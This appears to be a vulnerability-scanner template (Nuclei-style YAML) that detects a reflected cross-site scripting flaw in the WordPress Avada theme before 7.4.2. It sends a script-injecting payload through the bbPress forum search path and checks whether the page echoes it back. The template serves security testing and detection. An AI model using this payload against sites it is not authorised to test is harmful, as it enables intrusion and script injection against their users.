id: avada-xss

info:
  name: WordPress Avada Website Builder <7.4.2 - Cross-Site Scripting
  author: Akincibor
  severity: high
  description: WordPress Avada Website Builder prior to 7.4.2 contains a cross-site scripting vulnerability. The theme does not properly escape bbPress searches before outputting them back as breadcrumbs.
  reference:
    - https://wpscan.com/vulnerability/eb172b07-56ab-41ce-92a1-be38bab567cb
    - https://theme-fusion.com/documentation/avada/installation-maintenance/avada-changelog/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: xss,wp,wordpress,wp-theme,avada,wpscan

requests:
  - method: GET
    path:
      - '{{BaseURL}}/forums/search/z-->%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"></script><script>alert(document.domain)</script>'
          - 'avada-footer-scripts'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by md on 2022/09/19
